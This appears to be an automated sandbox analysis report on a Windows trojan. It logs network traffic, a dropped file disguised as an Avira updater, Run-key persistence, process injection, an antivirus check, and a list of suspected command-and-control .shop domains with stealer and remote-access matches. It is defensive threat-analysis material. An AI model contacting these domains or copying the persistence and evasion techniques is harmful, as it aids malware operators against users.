            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.4:49746 version: TLS 1.2

            System Summary

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | File dump: AviraOculus.exe.0.dr 976635604
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B323E NtQueryDefaultLocale, | 0_2_004B323E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B3B60 NtQueryDefaultLocale, | 0_2_004B3B60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B4040 NtQueryDefaultLocale, | 0_2_004B4040
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B305B NtQueryDefaultLocale, | 0_2_004B305B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B3462 NtQueryDefaultLocale, | 0_2_004B3462
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B3C30 NtQueryDefaultLocale, | 0_2_004B3C30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B3CFF NtQueryDefaultLocale, | 0_2_004B3CFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B30F3 NtQueryDefaultLocale, | 0_2_004B30F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B3553 NtQueryDefaultLocale, | 0_2_004B3553
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_004B3DAB NtQueryDefaultLocale, | 0_2_004B3DAB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087A9F1 DebugActiveProcessStop,NtCreateThreadEx, | 0_2_0087A9F1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087C4CF NtCreateThreadEx, | 0_2_0087C4CF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087D018 NtCreateThreadEx, | 0_2_0087D018
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087C46D NtCreateThreadEx, | 0_2_0087C46D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0085C99A NtCreateThreadEx, | 0_2_0085C99A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087D131 NtCreateThreadEx, | 0_2_0087D131
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0085D168 NtCreateThreadEx, | 0_2_0085D168
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087D3AC NtCreateThreadEx, | 0_2_0087D3AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087CBD0 NtCreateThreadEx, | 0_2_0087CBD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087C7FF NtCreateThreadEx, | 0_2_0087C7FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0087C37E NtCreateThreadEx, | 0_2_0087C37E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089597E0_2_0089597E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00897AC80_2_00897AC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008ABEC80_2_008ABEC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008AC6400_2_008AC640
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00895B800_2_00895B80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089A7B60_2_0089A7B6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008997CE0_2_008997CE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008967C50_2_008967C5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00898BD00_2_00898BD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008963050_2_00896305
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008983690_2_00898369
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089777C0_2_0089777C
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: AviraOculus.exe.0.dr | Static PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670551878.0000000000693000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.00000000026D7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.0000000000767000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.00000000029D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.00000000006F7000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.0000000002870000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.0000000002577000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Binary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Binary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/1@10/7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | File created: C:\Users\user\Music\AviraUpdater
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | ReversingLabs: Detection: 18%
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | String found in binary or memory: FileKey1=%CommonAppData%\Photodex\ProShow|photodex-presenter-install.log
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | String found in binary or memory: FileKey2=%CommonAppData%\Photodex\ProShow Producer|photodex-presenter-install.log
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: k7rn7l32.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: ntd3ll.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Section loaded: dpapi.dll
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static file information: File size 4547072 > 1048576
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_CURSOR
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_BITMAP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_ICON
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_MENU
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_DIALOG
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_STRING
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_ACCELERATOR
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: RT_GROUP_ICON
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x28f800
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1b6400
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: real checksum: 0x3bbe17 should be: 0x456a52
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: section name: .didata
            Source: AviraOculus.exe.0.dr | Static PE information: section name: .didata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00856882 pushad ; retf 0_2_00856893
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00856898 pushad ; retf 0_2_00856899
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00856D9B push esp; retf 0_2_00856D9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00856DAA push eax; retf 0_2_00856DAB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00856D36 push esp; retf 0_2_00856D3B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_0085529B pushfd ; retf 0_2_0085529D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00855301 pushfd ; retf 0_2_00855303
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00856F53 push eax; retf 0_2_00856F55
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00889C6A push esp; iretd 0_2_00889C6B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00889C63 push esp; iretd 0_2_00889C65
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00889C78 push eax; iretd 0_2_00889C7A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Code function: 0_2_00889C73 push eax; iretd 0_2_00889C74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | File created: C:\Users\user\Music\AviraUpdater\AviraOculus.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OculusAvira
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Dropped PE file which has not been started: C:\Users\user\Music\AviraUpdater\AviraOculus.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | API coverage: 9.2 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe TID: 1508 | Thread sleep time: -30000s >= -30000s
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966172474.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW4
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe base: 8B0000 value starts with: 4D5A
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: reinforcenh.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: stogeneratmns.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: fragnantbui.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: drawzhotdog.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: vozmeatillu.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: offensivedzvju.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: ghostreedmnu.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: gutterydhowi.shop
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.000000000296F000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.0000000000706000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.000000000280F000.00000004.00000800.00020000.00000000.sdmp, AviraOculus.exe.0.dr | Binary or memory string: DetectFile1=%ProgramFiles%\Malwarebytes' Anti-Malware\mbam.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.000000000296F000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.0000000000706000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.000000000280F000.00000004.00000800.00020000.00000000.sdmp, AviraOculus.exe.0.dr | Binary or memory string: DetectFile2=%ProgramFiles%\Malwarebytes Anti-Malware\mbam.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

            MITRE ATT&CK Matrix (a number before a technique name is the count of matched signatures for that technique)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
